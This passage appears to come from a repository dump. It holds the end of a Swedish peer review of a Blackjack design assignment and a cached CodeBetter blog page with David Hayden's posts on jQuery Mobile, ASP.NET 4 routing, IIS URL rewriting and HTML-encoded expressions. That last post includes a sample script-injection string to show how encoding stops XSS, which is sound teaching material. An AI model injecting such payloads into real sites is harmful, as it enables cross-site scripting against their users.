think the design/implementation has passed the grade 3 criteria?</h4> <p>Av det jag kunde se av koden och diagrammet så tror jag att applikationen klarar betyg 3.</p> </div> <div class="tab-pane" id="workshop-3-peer-4"> <h3>Peer Review för Sahand Rajabion</h3> <h4>Try to compile/use the source code provided. Can you get it up and running? Is anything problematic?</h4> <p>Programmet startar korrekt.</p> <h4>Test the runnable version of the application in a realistic way. Note any problems/bugs.</h4> <p>Jag kunde inte hitta några buggar, förutom att väntan för att visa att interfacet fungerar (på cirka två sekunder) påverkar hela utskriften istället för bara korten som presenteras. Inget som påverkar betyget eller uppgiften. Men något jag noterade.</p> <h4>Does the implementation and diagrams conform (do they show the same thing)? Are there any missing relations? Relations in the wrong direction?</h4> <p>Ja, vad jag kunde se så stämde dom överens. Inga fel i själva diagrammet med relationer. </p> <h4>Is the dependency between controller and view handled? How? Good? Bad?</h4> <p>Det beroende är löst genom att skapa en ny klass för att hantera värdet för menyn. Personligen skulle jag placerat den i Iview.cs som de andra views ärver. </p> <p>Detta fungerar också, men jag är lite allergisk mot att skapa upp extra klasser för så lite kod.</p> <h4>Is the Strategy Pattern used correctly for the rule variant Soft17?</h4> <p>Eftersom jag är jättedålig på poker så kunde jag inte få till det i spelet (eller i verkligheten), men det jag såg i koden såg korrekt ut.</p> <h4>Is the Strategy Pattern used correctly for the variations of who wins the game?</h4> <p>Ja, det var löst.</p> <h4>Is the duplicate code removed from everywhere?</h4> <p>Dupliceringen, vad jag kunde hitta, var borttagen korrekt.</p> <h4>Is the Observer Pattern correctly implemented?</h4> <p>Ja, det fungerade riktigt bra. </p> <h4>Is the class diagram updated to reflect the changes?</h4> <p>Klassdiagramet var uppdaterat med rätt klasser. Jag ser inga felaktigheter med det.</p> <h4>Do you think the design/implementation has passed the grade 3 criteria?</h4> <p>Jag tycker att koden och diagrammet klarar av betyg tre utan problem.</p> </div> </div> </body> </html>
wp-content/cache/blogs/davidhayden/wp-cache-davidhayden59130326c9dabd484abe40f9341f9491.html
btompkins/CodeBetter.Com-Wordpress
<!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <title>David Hayden</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link href="http://feeds.feedburner.com/CodeBetter" title="CodeBetter.Com &raquo; Feed" type="application/rss+xml" rel="alternate"> <link rel="pingback" href="http://codebetter.com/davidhayden/xmlrpc.php" /> <link rel='stylesheet' id='mainstyle-css' href='http://cdn1.codebetter.com/wp-content/themes/codebetter/style.css?ver=3.4.2' type='text/css' media='all' /> <link rel='stylesheet' id='jquerystyle-css' href='http://cdn1.codebetter.com/wp-content/themes/codebetter/jquery-ui-1.8.1.custom.css?ver=3.4.2' type='text/css' media='all' /> <link rel='stylesheet' id='wp_greet_box_style-css' href='http://cdn1.codebetter.com/wp-content/plugins/wp-greet-box/css/style.css?ver=3.4.2' type='text/css' media='all' /> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-includes/js/jquery/jquery.js?ver=1.7.2'></script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/wp-greet-box/js/functions.js?ver=3.4.2'></script> <script type='text/javascript' src='http://cdn1.codebetter.com/wp-content/plugins/wp-greet-box/js/js-mode.js?ver=3.4.2'></script> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://codebetter.com/davidhayden/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://cdn1.codebetter.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 3.4.2" /> <!-- All in One SEO Pack 1.6.15.2 by Michael Torbert of Semper Fi Web Design[83,158] --> <link rel="canonical" href="http://codebetter.com/davidhayden/" /> <!-- /all in one seo pack --> <link rel="stylesheet" href="http://cdn1.codebetter.com/wp-content/plugins/digg-digg/include/../css/diggdigg-style.css?ver=5.2.9" type="text/css" media="screen" /><meta id="syntaxhighlighteranchor" name="syntaxhighlighter-version" content="3.1.3" /> <script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=7744&amp;target=_blank'></script> <style type="text/css">body { padding-top:0px !important; } html { margin-top: 0px !important; }</style> <!-- BuySellAds Ad Code --> <script type="text/javascript"> (function(){ var bsa = document.createElement('script'); bsa.type = 'text/javascript'; bsa.async = true; bsa.src = 'http://s3.buysellads.com/ac/bsa.js'; (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa); })(); </script> <!-- End BuySellAds Ad Code --> </head> <body> <div class="container_12 ui-tabs ui-widget ui-widget-content ui-corner-all" id="tabs"> <ul class="ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all"> <li class="ui-state-default ui-corner-top ui-tabs-selected ui-state-active"><a href="#ui-tabs-1">CodeBetter.Com</a></li> <li class="ui-state-default ui-corner-top"><a href="http://devlicio.us">Devlicio.Us</a></li> <div id="top-search"> <form action="http://codebetter.com/globalsearch/" id="cse-search-box"> <div> <fieldset id="search"> <input type="hidden" name="cx" value="005178204031477491434:2bg5jtwgsfe" /> <input type="hidden" name="cof" value="FORID:9" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" class="text-input" id="s" name="q" size="31" /> <input type="image" src="http://cdn1.codebetter.com/wp-content/themes/codebetter/images/search-img.png" class="form-button" id="searchsubmit" value="GO" name=""> </fieldset> </div> </form> <script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script> </div> </ul><div id="ui-tabs-1" class="ui-tabs-panel ui-widget-content ui-corner-bottom"></div><div id="ui-tabs-2" class="ui-tabs-panel ui-widget-content ui-corner-bottom ui-tabs-hide"></div> </div> <div id="main" class="container_12"> <div id="logo" class="grid_3"><a href="/" title="CodeBetter.Com - Stuff you need to Code Better!"><image src="http://cdn1.codebetter.com/wp-content/themes/codebetter/images/codebetter_logo.png" height="48" width="223"></image></a></div> <div id="ad_leaderboard" class="grid_9"> <!-- BuySellAds Zone Code --> <div id="bsap_1276080" class="bsarocks bsap_4fe632babdccc2b4b049e4f08cc3c549"></div> <!-- End BuySellAds Zone Code --></div> <div id="globalNav" class="grid_12"> <ul> <li><a href="http://codebetter.com" title="home">Home</a></li> <li class="page_item page-item-2"><a href="http://codebetter.com/about/">About</a></li> <li class="page_item page-item-8"><a href="http://codebetter.com/codebetter-ci/">CodeBetter CI</a></li> <li class="page_item page-item-6"><a href="http://codebetter.com/community/">Community</a></li> <li class="page_item page-item-10"><a href="http://codebetter.com/editors/">Editors</a></li> <li><a href="http://feeds.feedburner.com/CodeBetter" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" alt="" style="vertical-align:middle;border:0"/></a><a href="http://feeds.feedburner.com/CodeBetter"><img src="http://feeds.feedburner.com/~fc/CodeBetter?bg=EFEFEF&amp;fg=2E9BD2&amp;anim=1" height="26" width="88" style="vertical-align:middle;border:0"/></a></li> </ul> </div><!-- end div#globalNav.container_12 --> <div id="content"> <div id="main" class="grid_8"> <div id="greet_block"><noscript><div class="greet_block wpgb_cornered"><div class="greet_text"><div class="greet_image"><a href="http://codebetter.com/davidhayden/feed/rss/" rel="nofollow"><img src="http://cdn1.codebetter.com/wp-content/plugins/wp-greet-box/images/rss_icon.png" alt="WP Greet Box icon"/></a></div>Hello there! If you are new here, you might want to <a href="http://codebetter.com/davidhayden/feed/rss/" rel="nofollow"><strong>subscribe to the RSS feed</strong></a> for updates on this topic.<div style="clear:both"></div><div class="greet_block_powered_by">Powered by <a href="http://omninoggin.com/projects/wordpress-plugins/wp-greet-box-wordpress-plugin/" title="WP Greet Box WordPress Plugin" style="text-decoration:none;">WP Greet Box</a> <a href="http://omninoggin.com/" title="WordPress Plugin" style="text-decoration:none;">WordPress Plugin</a></div><div style="clear:both"></div></div></div></noscript></div> <div id="nav-above" class="navigation"> <div class="nav-next"><a href="?page=1" > Next Page &raquo;</a></div> </div><!-- #nav-above --> <div id="post-344" class="post-344 post type-post status-publish format-standard hentry category-jquery-mobile"> <h2 class="entry-title"><a href="http://codebetter.com/davidhayden/2010/11/22/jquery-mobile-alpha-2-bug-with-links/" title="Permalink to jQuery Mobile Alpha 2 Bug with Links" rel="bookmark">jQuery Mobile Alpha 2 Bug with Links</a></h2> <div class="entry-meta"> <span class="meta-prep meta-prep-author">Posted on </span><a href="http://codebetter.com/davidhayden/2010/11/22/jquery-mobile-alpha-2-bug-with-links/" title="11:23 pm" rel="bookmark"><span class="entry-date">November 22, 2010</span></a> <span class="meta-sep"> by </span> <span class="author vcard"><a class="url fn n" href="http://codebetter.com/davidhayden" title="View all posts by davidhayden">davidhayden</a></span> </div><!-- .entry-meta --> <div class="entry-content"> <p>I just started playing with <strong>jQuery Mobile Alpha 2</strong> and a crazy little bug associated with links got my head spinning the other day. If you read through the API Documentation you will see that a normal link, such as &lt;a href=&#8221;blog.html&#8221;&gt;blog&lt;/a&gt;, will be hijaxed if the browser supports it. However, when I click on the link and view a page within the same directory as the referring page, the linked page displays with no style. It looks like a plain HTML page with no CSS as opposed to a cool looking jQuery Mobile Page.</p> <p>Turns out this is a bug with the latest release and there are a few ways to fix it. My solution was to just append a &#8220;?&#8221; at the end of the url of the link. I did it with a bit of unobtrusive jQuery, but just appending the &#8220;?&#8221; to the url manually will work as well.</p> <p><img src="http://codebetter.com/davidhayden/files/2010/11/jQueryMobile.jpg" alt="jQuery Mobile Alpha 2" /></p> <p>Appending the &#8220;?&#8221; will cause the blog.html page to be rendered correctly within the browser. If you are just starting out with jQuery Mobile Alpha 2 and come across this bug, I hope this quick post helps you out.</p> <p><a href="http://www.davidhayden.com/">David Hayden</a></p> </div><!-- .entry-content --> <div class="entry-utility"> <span class="cat-links"><span class="entry-utility-prep entry-utility-prep-cat-links">Posted in <a href="http://codebetter.com/davidhayden/category/jquery-mobile/" title="View all posts in jQuery Mobile" rel="category">jQuery Mobile</a></span></span> <span class="meta-sep"> | </span> <span class="comments-link"><a href="http://codebetter.com/davidhayden/2010/11/22/jquery-mobile-alpha-2-bug-with-links/#comments" title="Comment on jQuery Mobile Alpha 2 Bug with Links">3 Comments</a></span> </div><!-- #entry-utility --> </div><!-- #post-344 --> <div id="post-340" class="post-340 post type-post status-publish format-standard hentry category-uncategorized"> <h2 class="entry-title"><a href="http://codebetter.com/davidhayden/2010/03/28/html-encoded-code-expressions-in-asp-net-4/" title="Permalink to Html Encoded Code Expressions in ASP.NET 4" rel="bookmark">Html Encoded Code Expressions in ASP.NET 4</a></h2> <div class="entry-meta"> <span class="meta-prep meta-prep-author">Posted on </span><a href="http://codebetter.com/davidhayden/2010/03/28/html-encoded-code-expressions-in-asp-net-4/" title="2:05 am" rel="bookmark"><span class="entry-date">March 28, 2010</span></a> <span class="meta-sep"> by </span> <span class="author vcard"><a class="url fn n" href="http://codebetter.com/davidhayden" title="View all posts by davidhayden">davidhayden</a></span> </div><!-- .entry-meta --> <div class="entry-content"> <p>Just returned home from the <a href="http://www.flacodebrew.net/Post/OrlandoCodeCamp2010.aspx">Orlando Code Camp</a> with my 3 children who were real troopers for joining me on the trip. We woke up at 4:30am for a 2+ hour drive so I could speak about <a href="http://www.davidhayden.me/2010/03/whats-new-in-aspnet-4-at-orlando-code-camp.html">What&rsquo;s New in ASP.NET 4</a> at 8:30am.</p> <p>I realized on my ride home that I neglected to mention <b>Html Encoded Code Expressions</b> as a new feature in ASP.NET 4. It was in my code and listed in the tutorials, but somehow in the excitement of mentioning the other ASP.NET 4 Features it got overlooked. Hence, I thought I would follow-up with a quick blog post to remedy the situation.</p> <p>Html Encoded Code Expressions is a handy way to eliminate <b>javascript injection</b> in your web applications. So often developers forget that input from various 3rd party sources, like user input and the database, is evil and should never be trusted. Any data displayed on a browser, for example, should be properly encoded to assure it doesn&rsquo;t run malicious scripts.</p> <p>When you display data to a browser you will sometimes use the following code expression:</p> <p>&nbsp;</p> <pre><p>&lt;%= data %&gt;</p></pre> <p>&nbsp;</p> <p>If the data were somehow injected with javascript in addition to its value, such as <b>&ldquo;&lt;script&gt;alert(&lsquo;Hello&rsquo;);&lt;/script&gt;javascript injected&rdquo;</b>, you will get a very unwelcome javascript dialog box displaying <b>hello</b> in addition to the text being displayed on the screen.</p> <p>If instead you were to use the new HTML Encoded Code Expression in ASP.NET 4, which replaces &ldquo;=&rdquo; with &ldquo;:&rdquo; as such:</p> <p>&nbsp;</p> <pre><p>&lt;%: data %&gt;</p></pre> <p>&nbsp;</p> <p>The result would be a properly encoded string which would cause the script to <span style="text-decoration: underline">not</span> be run, but instead displayed as text on the browser: <b>&ldquo;&lt;script&gt;alert(&lsquo;Hello&rsquo;);&lt;/script&gt;javascript injected&rdquo;</b>.</p> <p>&nbsp;</p> <p>You can try the difference yourself. Put the following two statements in the source of your ASP.NET 4 Page and watch &lt;%= &hellip; %&gt; execute the javascript while the other, &lt;%: &hellip; %&gt;, encodes the javascript as text:</p> <p>&nbsp;</p> <pre>&lt;%= &ldquo;&lt;script&gt;alert(&lsquo;Hello&rsquo;);&lt;/script&gt;javascript injected&rdquo; %&gt;<br />&lt;%: &ldquo;&lt;script&gt;alert(&lsquo;Hello&rsquo;);&lt;/script&gt;javascript injected&rdquo; %&gt;</pre> <p>&nbsp;</p> <p>If you attended the <a href="http://www.davidhayden.me/sarasota-web-developer-group/">Sarasota Web Developer Group</a>, we went over this new ASP.NET 4 Feature in detail.</p> <p>&nbsp;</p> <p>Hope this helps.</p> <p>&nbsp;</p> <p><a href="http://www.davidhayden.com/">David Hayden</a></p> </div><!-- .entry-content --> <div class="entry-utility"> <span class="cat-links"><span class="entry-utility-prep entry-utility-prep-cat-links">Posted in <a href="http://codebetter.com/davidhayden/category/uncategorized/" title="View all posts in Uncategorized" rel="category">Uncategorized</a></span></span> <span class="meta-sep"> | </span> <span class="comments-link"><a href="http://codebetter.com/davidhayden/2010/03/28/html-encoded-code-expressions-in-asp-net-4/#respond" title="Comment on Html Encoded Code Expressions in ASP.NET 4">Leave a comment</a></span> </div><!-- #entry-utility --> </div><!-- #post-340 --> <div id="post-339" class="post-339 post type-post status-publish format-standard hentry category-uncategorized"> <h2 class="entry-title"><a href="http://codebetter.com/davidhayden/2010/03/22/sarasota-web-asp-net-mvc-castle-activerecord-and-dynamicdata/" title="Permalink to Sarasota Web: ASP.NET MVC, Castle ActiveRecord, and DynamicData" rel="bookmark">Sarasota Web: ASP.NET MVC, Castle ActiveRecord, and DynamicData</a></h2> <div class="entry-meta"> <span class="meta-prep meta-prep-author">Posted on </span><a href="http://codebetter.com/davidhayden/2010/03/22/sarasota-web-asp-net-mvc-castle-activerecord-and-dynamicdata/" title="7:02 pm" rel="bookmark"><span class="entry-date">March 22, 2010</span></a> <span class="meta-sep"> by </span> <span class="author vcard"><a class="url fn n" href="http://codebetter.com/davidhayden" title="View all posts by davidhayden">davidhayden</a></span> </div><!-- .entry-meta --> <div class="entry-content"> <p><a href="http://www.pnpguidance.net/downloads/sarasotawebmar2010.pdf"><img style="border-bottom: 0px;border-left: 0px;margin-left: 0px;border-top: 0px;margin-right: 0px;border-right: 0px" alt="Sarasota-Web-Developer-Group-March-2010-Meeting" src="http://s3.amazonaws.com:80/CodeBetter/CommunityServer.Blogs.Components.WeblogFiles/david/hayden/SarasotaWebDeveloperGroupMarch2010Meeting_thumb_63D28635.png?AWSAccessKeyId=0KMA35HT86EVXB99Z302&amp;Expires=1919787589&amp;Signature=rai4212YnKcl7P5cWMeg0HzBY%2fs%3d" align="right" border="0" width="252" height="326" /></a> The <a href="http://www.davidhayden.me/sarasota-web-developer-group/">Sarasota Web Developer Group</a> is having our second meeting this Wednesday, March 24, 2010 at 6pm. We have two presentations and a tool spotlight:</p> <ul> <li><b>Presentation 1</b>: Build ASP.NET MVC Contact Manager from Scratch </li> <li><b>Tool Spotlight</b>: Castle ActiveRecord, SQLite, and NHProf </li> <li><b>Presentation 2</b>: Get RAD with DynamicData </li> </ul> <p>You can get the full details as well as register at:</p> <ul> <li><a href="http://www.davidhayden.me/2010/02/leveraging-aspnet-mvc-web-forms-dynamicdata-castle-activerecord.html">Leveraging ASP.NET MVC &#8211; Web Forms &#8211; DynamicData &#8211; Castle ActiveRecord</a> </li> </ul> <p>You can also download our <a href="http://www.pnpguidance.net/downloads/sarasotawebmar2010.pdf">monthly newsletter</a>.</p> <p>See you there!</p> <p>&nbsp;</p> <p><a href="http://www.davidhayden.com/">David Hayden</a></p> </div><!-- .entry-content --> <div class="entry-utility"> <span class="cat-links"><span class="entry-utility-prep entry-utility-prep-cat-links">Posted in <a href="http://codebetter.com/davidhayden/category/uncategorized/" title="View all posts in Uncategorized" rel="category">Uncategorized</a></span></span> <span class="meta-sep"> | </span> <span class="comments-link"><a href="http://codebetter.com/davidhayden/2010/03/22/sarasota-web-asp-net-mvc-castle-activerecord-and-dynamicdata/#respond" title="Comment on Sarasota Web: ASP.NET MVC, Castle ActiveRecord, and DynamicData">Leave a comment</a></span> </div><!-- #entry-utility --> </div><!-- #post-339 --> <div id="post-338" class="post-338 post type-post status-publish format-standard hentry category-uncategorized"> <h2 class="entry-title"><a href="http://codebetter.com/davidhayden/2010/03/20/iis-7-url-rewriter-for-seo-friendly-url-s/" title="Permalink to IIS 7 URL Rewriter for SEO Friendly URL’s" rel="bookmark">IIS 7 URL Rewriter for SEO Friendly URL’s</a></h2> <div class="entry-meta"> <span class="meta-prep meta-prep-author">Posted on </span><a href="http://codebetter.com/davidhayden/2010/03/20/iis-7-url-rewriter-for-seo-friendly-url-s/" title="3:46 pm" rel="bookmark"><span class="entry-date">March 20, 2010</span></a> <span class="meta-sep"> by </span> <span class="author vcard"><a class="url fn n" href="http://codebetter.com/davidhayden" title="View all posts by davidhayden">davidhayden</a></span> </div><!-- .entry-meta --> <div class="entry-content"> <p>The other day I commented on how the <a href="http://davidhayden.com/blog/dave/archive/2010/03/18/IISUrlRewriterSearchEngineOptimization.aspx">IIS 7 URL Rewriter</a> can be a neat way to transition your legacy ASP.NET Web Forms URL&rsquo;s consisting of querystrings to a more RESTful, searchengine-friendly syntax. Actually, this can either be 1) a more transitory solution until you move to the new <a href="http://www.davidhayden.me/2010/03/aspnet-4-web-forms-routing.html">ASP.NET 4 Web Forms Routing</a> or <a href="http://davidhayden.com/blog/dave/archive/2009/08/25/AspNetMvc20Tutorials.aspx">ASP.NET MVC</a>, or 2) a permanent solution if you have a legacy application that you don&rsquo;t plan to upgrade but want the cleaner routing.</p> <p>After about 15 minutes of playing with the URL Rewriter I was pretty amazed at how quickly and easily one can clean up the inbound at outbound URL&rsquo;s using it.</p> <p>I created a page on my localhost that displayed products for a particular category for an e-commerce website and accepted the category as a querystring parameter as such:</p> <p>&nbsp;</p> <p><b>http://localhost/products.aspx?category=bikinis</b></p> <p>&nbsp;</p> <p>I wanted to map this URL for both inbound and outbound links to something cleaner, like:</p> <p>&nbsp;</p> <p><b>http://localhost/category/bikinis</b></p> <p>&nbsp;</p> <p>My thought was that this would be a fair amount of work, but in reality the IIS 7 URL Rewriter makes this a breeze.</p> <p>Once you have installed the IIS 7 URL Rewriter you have the ability to add a rule, and in this specific case, a <b>User-friendly URL</b>, that is located under the header, <b>Inbound and Outbound Rules</b>.</p> <p>&nbsp;</p> <p><a href="/cfs-file.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/david.hayden/IIS7UrlRewriter_5F00_180224F9.jpg"><img style="border-right-width: 0px;border-top-width: 0px;border-bottom-width: 0px;border-left-width: 0px" alt="IIS7UrlRewriter" src="http://s3.amazonaws.com:80/CodeBetter/CommunityServer.Blogs.Components.WeblogFiles/david/hayden/IIS7UrlRewriter_thumb_693C6C56.jpg?AWSAccessKeyId=0KMA35HT86EVXB99Z302&amp;Expires=1919787589&amp;Signature=hqxnkSGfftKEUSc8Bsm7%2bQmY4M8%3d" border="0" width="556" height="371" /></a> </p> <p>&nbsp;</p> <p>Now this is where it gets slick. One enters the original URL and then chooses a more User-friendly URL from a dropdown and lets the URL Rewriter handle the rest. If, of course, you want more control you can pick another rule, but this worked perfectly for what I had in mind.</p> <p>&nbsp;</p> <p><a href="/cfs-file.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/david.hayden/SeoFriendlyUrls_5F00_4195F02C.jpg"><img style="border-right-width: 0px;border-top-width: 0px;border-bottom-width: 0px;border-left-width: 0px" alt="SeoFriendlyUrls" src="http://s3.amazonaws.com:80/CodeBetter/CommunityServer.Blogs.Components.WeblogFiles/david/hayden/SeoFriendlyUrls_thumb_60D896FF.jpg?AWSAccessKeyId=0KMA35HT86EVXB99Z302&amp;Expires=1919787589&amp;Signature=%2fwJtxuiOlE86YctSqDprnZEyZBo%3d" border="0" width="490" height="526" /></a> </p> <p>&nbsp;</p> <p>After you save the rule, your inbound routes will work correctly for any category as such:</p> <p>&nbsp;</p> <p>http://localhost/category/bikinis</p> <p>http://localhost/category/tshirts</p> <p>http://localhost/category/hats</p> <p>&nbsp;</p> <p>Also, all links to this page within the website will automagically be converted from the old querystring URL to the more searchengine-friendly URL on your behalf, no work required. Very, very slick.</p> <p>If you could benefit from more searchengine-friendly URL&rsquo;s, the IIS 7 URL Rewriter is worth a look. I was pretty impressed with what I could do in just 15 minutes. After a bit more understanding, I&rsquo;ll definitely be showing it off at a future <a href="http://www.davidhayden.me/sarasota-web-developer-group/">Sarasota Web Developer Group</a> Meeting.</p> <p>&nbsp;</p> <p><a href="http://www.davidhayden.com/">David Hayden</a></p> </div><!-- .entry-content --> <div class="entry-utility"> <span class="cat-links"><span class="entry-utility-prep entry-utility-prep-cat-links">Posted in <a href="http://codebetter.com/davidhayden/category/uncategorized/" title="View all posts in Uncategorized" rel="category">Uncategorized</a></span></span> <span class="meta-sep"> | </span> <span class="comments-link"><a href="http://codebetter.com/davidhayden/2010/03/20/iis-7-url-rewriter-for-seo-friendly-url-s/#comments" title="Comment on IIS 7 URL Rewriter for SEO Friendly URL’s">1 Comment</a></span> </div><!-- #entry-utility --> </div><!-- #post-338 --> <div id="post-337" class="post-337 post type-post status-publish format-standard hentry category-uncategorized"> <h2 class="entry-title"><a href="http://codebetter.com/davidhayden/2010/03/07/getrouteurl-in-asp-net-4-web-forms-routing/" title="Permalink to GetRouteUrl in ASP.NET 4 Web Forms Routing" rel="bookmark">GetRouteUrl in ASP.NET 4 Web Forms Routing</a></h2> <div class="entry-meta"> <span class="meta-prep meta-prep-author">Posted on </span><a href="http://codebetter.com/davidhayden/2010/03/07/getrouteurl-in-asp-net-4-web-forms-routing/" title="4:55 am" rel="bookmark"><span class="entry-date">March 7, 2010</span></a> <span class="meta-sep"> by </span> <span class="author vcard"><a class="url fn n" href="http://codebetter.com/davidhayden" title="View all posts by davidhayden">davidhayden</a></span> </div><!-- .entry-meta --> <div class="entry-content"> <p>As I mentioned we are learning the new enhancements in ASP.NET 4 and ASP.NET 4 Web Forms from scratch at the <a href="http://www.davidhayden.me/sarasota-web-developer-group/">Sarasota Web Developer Group</a>. At the first meeting we talked about many of the new enhancement in ASP.NET 4 Web Forms, including the new enhancements in&nbsp;<a href="http://www.davidhayden.me/2010/03/aspnet-4-web-forms-routing.html">ASP.NET 4 Web Forms Routing</a>.</p> <p>&nbsp;</p> <p><strong>GetRouteUrl</strong></p> <p>In my last post I neglected to mention the <strong>Control.GetRouteUrl</strong> Method in <strong>System.Web.UI</strong> as a way to get routes from the route name and various route parameters. Using the following route from the previous post:</p> <p>&nbsp;</p> <pre>public class Global : System.Web.HttpApplication { void Application_Start(object sender, EventArgs e) { RegisterRoutes(RouteTable.Routes); } void RegisterRoutes(RouteCollection routes) { routes.MapPageRoute( "Contact_Details", // Route Name "Contacts/Details/{id}", // Url and Parameters "~/Contacts/Details.aspx" // Page Handling Request ); } } </pre> <p>&nbsp;</p> <p>One can get the route for a particular contact inside a&nbsp;<strong>Page_Load</strong> Event, for example, by calling GetRouteUrl on the Page as follows:</p> <p>&nbsp;</p> <pre>protected void Page_Load(object sender, EventArgs e) { var route = GetRouteUrl("Contact_Details", new { id = 1 }); } </pre> <p>&nbsp;</p> <p>The value of route in this case will be <strong>&#8220;/Contact/Details/1&#8243;</strong>.</p> <p>&nbsp;</p> <p><strong>GetRouteUrl when DataBinding in Grid</strong></p> <p>The GetRouteUrl Method is particularly useful in a Grid when you want to display a list of contacts with a link to the details of each. Shown below is just a snippet of the Grid source code where I am using GetRouteUrl with the proper Route Name and Parameters within the NavigateUrl Property of the HyperLink:</p> <p>&nbsp;</p> <pre>&lt;asp:TemplateField&gt; &lt;ItemTemplate&gt; &lt;asp:HyperLink ID="HyperLink1" runat="server" NavigateUrl='&lt;%# GetRouteUrl("Contact_Details", new {id = Eval("Id") }) %&gt;' Text='&lt;%# Eval("Id") %&gt;'&gt; &lt;/asp:HyperLink&gt; &lt;/ItemTemplate&gt; &lt;/asp:TemplateField&gt; </pre> <p>&nbsp;</p> <p><strong>Conclusion</strong></p> <p>I&#8217;ll be posting about other topics presented at the group. If you live in the area, please come out and attend the second meeting focusing on <a href="http://www.davidhayden.me/2010/02/leveraging-aspnet-mvc-web-forms-dynamicdata-castle-activerecord.html">ASP.NET MVC, DynamicData, Castle ActiveRecord, and more</a>. I&#8217;ll also be presenting <a href="http://www.davidhayden.me/2010/03/whats-new-in-aspnet-4-at-orlando-code-camp.html">What&#8217;s New in ASP.NET 4 at the Orlando Code Camp</a>.</p> <p>&nbsp;</p> <p><a href="http://www.davidhayden.com/">David Hayden</a></p> <p>&nbsp;</p> </div><!-- .entry-content --> <div class="entry-utility"> <span class="cat-links"><span class="entry-utility-prep entry-utility-prep-cat-links">Posted in <a href="http://codebetter.com/davidhayden/category/uncategorized/" title="View all posts in Uncategorized" rel="category">Uncategorized</a></span></span> <span class="meta-sep"> | </span> <span class="comments-link"><a href="http://codebetter.com/davidhayden/2010/03/07/getrouteurl-in-asp-net-4-web-forms-routing/#respond" title="Comment on GetRouteUrl in ASP.NET 4 Web Forms Routing">Leave a comment</a></span> </div><!-- #entry-utility --> </div><!-- #post-337 --> <div id="nav-below" class="navigation"> <div class="nav-next"><a href="?page=1" > Next Page &raquo;</a></div> </div><!-- #nav-below --> </div><!-- #main --> <div id="sidebar" class="grid_4"> <div id="primary" class="widget-area"> <ul class="xoxo"> <div class="ad-container"> <script type='text/javascript'><!--// <![CDATA[ OA_show(29416); // ]]> --></script><noscript><a target='_blank' href='http://d1.openx.org/ck.php?n=2782afb'><img border='0' alt='' src='http://d1.openx.org/avw.php?zoneid=29416&amp;n=2782afb' /></a></noscript><script type='text/javascript'><!--// <![CDATA[ OA_show(29417); // ]]> --></script><noscript><a target='_blank' href='http://d1.openx.org/ck.php?n=e94cea6'><img border='0' alt='' src='http://d1.openx.org/avw.php?zoneid=29417&amp;n=e94cea6' /></a></noscript><script type='text/javascript'><!--// <![CDATA[ OA_show(29418); // ]]> --></script><noscript><a target='_blank' href='http://d1.openx.org/ck.php?n=9ba3022'><img border='0' alt='' src='http://d1.openx.org/avw.php?zoneid=29418&amp;n=9ba3022' /></a></noscript><script type='text/javascript'><!--// <![CDATA[ OA_show(29419); // ]]> --></script><noscript><a target='_blank' href='http://d1.openx.org/ck.php?n=f467b52'><img border='0' alt='' src='http://d1.openx.org/avw.php?zoneid=29419&amp;n=f467b52' /></a></noscript> </div> <li id="user_bio-2" class="widget-container widget_user_bio"><h3 class="widget-title"></h3>One of these days I will add something to my user profile! For now, I shall remain mysterious. </li> </ul> </div><!-- #primary .widget-area --> <div id="secondary" class="widget-area"> <script type='text/javascript'><!--// <![CDATA[ OA_show(220407); // ]]> --></script><noscript><a target='_blank' href='http://d1.openx.org/ck.php?n=68b8307'><img border='0' alt='' src='http://d1.openx.org/avw.php?zoneid=220407&amp;n=68b8307' /></a></noscript> <ul class="xoxo"> </ul> <script type='text/javascript'><!--// <![CDATA[ OA_show(29421); // ]]> --></script><noscript><a target='_blank' href='http://d1.openx.org/ck.php?n=3f8e353'><img border='0' alt='' src='http://d1.openx.org/avw.php?zoneid=29421&amp;n=3f8e353' /></a></noscript> </div><!-- #secondary .widget-area --> </div><!--sidebar--> </div><!-- #content --> </div><!-- end div tabs see header.php --> <div id="footer"> <div class="container_12"> <div id="footer-widget-area"> <div class="grid_4"> <ul> <li><a href="http://codebetter.com" title="home">Home</a></li> <li class="page_item page-item-2"><a href="http://codebetter.com/about/">About</a></li> <li class="page_item page-item-8"><a href="http://codebetter.com/codebetter-ci/">CodeBetter CI</a></li> <li class="page_item page-item-6"><a href="http://codebetter.com/community/">Community</a></li> <li class="page_item page-item-10"><a href="http://codebetter.com/editors/">Editors</a></li> <li class="page_item page-item-41"><a href="http://codebetter.com/globalsearch/">Search Results</a></li> <li><a href="http://feeds.feedburner.com/CodeBetter" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon16x16.png" alt="" style="vertical-align:middle;border:0"/></a><a href="http://feeds.feedburner.com/CodeBetter"><img src="http://feeds.feedburner.com/~fc/CodeBetter?bg=FFFFFF&amp;fg=2E9BD2&amp;anim=1" height="26" width="88" style="vertical-align:middle;border:0"/></a></li> </ul> </div><!-- #second .widget-area --> <div class="grid_4"> <h3>Friends of CodeBetter.Com</h3> <ul> <li><a href="http://red-gate.com/">Red-Gate Tools For SQL and .NET</a></li> <li><a href="http://telerik.com">Telerik .NET Tools</a></li> <li><a href="http://jetbrains.com/resharper/">JetBrains - ReSharper</a></li> <li><a href="http://scootersoftware.com">Beyond Compare</a></li> <li><a href="http://www.ndepend.com/">NDepend</a></li> <li><a href="http://www.sapphiresteel.com/">Ruby In Steel</a></li> <li><a href="http://www.slickedit.com/">SlickEdit</a></li> <li><a href="http://www.gurock.com/products/smartinspect/">SmartInspect .NET Logging</a></li> <li>NGEDIT: <a href="http://www.viemu.com/">ViEmu</a> and <a 